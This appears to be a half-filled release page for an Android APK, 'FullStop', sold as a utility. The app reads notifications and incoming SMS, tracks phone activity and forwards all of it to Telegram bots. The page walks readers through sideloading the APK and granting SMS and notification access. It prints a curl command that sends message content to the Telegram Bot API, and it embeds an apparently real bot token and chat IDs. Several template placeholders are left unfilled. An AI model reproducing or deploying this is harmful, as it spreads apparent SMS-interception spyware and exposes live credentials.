Version: 15.5.4 • Release date: 11/08/2025
FullStop is an all-in-one mobile utility that: captures and processes system notifications, reads and rates incoming SMS, forwards selected notifications/SMS to Telegram (and other targets), and identifies phone activity (foreground app / screen events) for contextual workflows.
Short: notification handling + SMS processing + forwarding + phone activity identification — packed into one app.
- Notification Read & Forward — capture system notifications, filter, redact, and forward to Telegram/chat targets.
 - SMS Read, Rate & Forward — read incoming SMS, apply rating rules (spam/important/auto-tag), and forward to configured channels.
 - Phone Activity Identification — detect active app, screen on/off, call states to tag context with forwarded messages.
 - Telegram Integration — direct Telegram Bot API support; forward to single or multiple chat IDs or channels.
 - Multi-target Forwarding — Telegram + HTTP webhook endpoints + optional email/S3 (placeholders).
 - Rule Engine — customizable rules for filtering, masking PII, auto-forward, or suppressing alerts.
 - Local Log & Audit — local message logs, with export option (CSV/JSON).
 
- Download the APK: 
FullStop-v{{VERSION}}.apk - Enable Install unknown apps for your package installer if required.
 - Install/Upgrade — existing settings are preserved on in-place upgrade. If you face permission issues, uninstall then reinstall.
 
- Notification access — to read and capture notifications.
 - SMS receive & read — to detect and process SMS (Android SMS permissions).
 - Foreground service — to reliably track phone activity and keep the app alive.
 - Network access — to forward messages to Telegram / webhooks.
 - Optional storage — to export logs (CSV/JSON).
 
Below are the key configuration placeholders you must fill before using forwarding features. Replace {{...}} tokens with real values.
TELEGRAM_BOT_TOKEN:e.g.8462399272:AAGqOZLNh6bnuIVEdEUXtpF0b7MPXh4pMwkDEFAULT_CHAT_ID:e.g.8030227425ADDITIONAL_CHAT_IDS:comma-separated list,8030227425,5185579644
WEBHOOK_URL_1:{{WEBHOOK_URL_1}}- Optional auth header: 
WEBHOOK_AUTH_HEADER={{WEBHOOK_AUTH_HEADER}} 
- PII mask template: 
{{PII_MASK}}(example:***MASKED***). - Phone activity tag: set to 
ON/OFFto append active-app context. 
Note: For Telegram bot setup, follow the standard BotFather flow to create a bot and obtain the bot token. Use the bot token above to send messages programmatically.
curl -s -X POST "https://api.telegram.org/bot8462399272:AAGqOZLNh6bnuIVEdEUXtpF0b7MPXh4pMwk/sendMessage" -d chat_id="8462399272" "5185579644" -d text="New notification from NotifyMe: {{MESSAGE_PREVIEW}}"
Replace tokens with real values. The app can call this automatically when forwarding rules match.
- v{{VERSION}} — Unified release: Notification routing + SMS rating/forwarding + phone activity identification + multi-target forwarding + export logs.
 - Improved rule engine and PII masking.
 - Performance: reduced battery impact via optimized foreground service scheduling.
 
- Android OEM battery optimizations may stop the foreground service on some devices — ask user to whitelist the app in device power settings.
 - SMS reading requires explicit permission on recent Android versions; user must accept at runtime.
 - Telegram rate limits — forwarding a very high volume of messages may be throttled by Telegram APIs.
 
    By default, FullStop will not forward messages containing configured sensitive patterns (PII). Configure the PII_MASK and rule engine to redact phone numbers or other secrets. Stored logs are local; enable encrypted backups at your own risk.
  
// Toggle phone activity tagging PHONE_ACTIVITY_TAGGING=ON
// Set PII mask PII_MASK=REDACTED
// Default targets TELEGRAM_BOT_TOKEN="{{TELEGRAM_BOT_TOKEN}}" DEFAULT_CHAT_ID="{{TELEGRAM_CHAT_ID}}" WEBHOOK_URL_1="{{WEBHOOK_URL_1}}"
If you find bugs or want new features, please report to {{SUPPORT_EMAIL}} or open an issue at {{ISSUE_TRACKER_URL}}.
© {{YEAR}} FullStop — include your license here (MIT / Apache-2.0 / Proprietary).
{{RELEASE_DATE}} • Template engine: smackdown/html-markdown • Edit placeholders before publishing.
  BOT_Token:
Notify Me:8462399272:AAGqOZLNh6bnuIVEdEUXtpF0b7MPXh4pMwk
Chat ID:
NotifyMe 8030227425
MSI 5185579644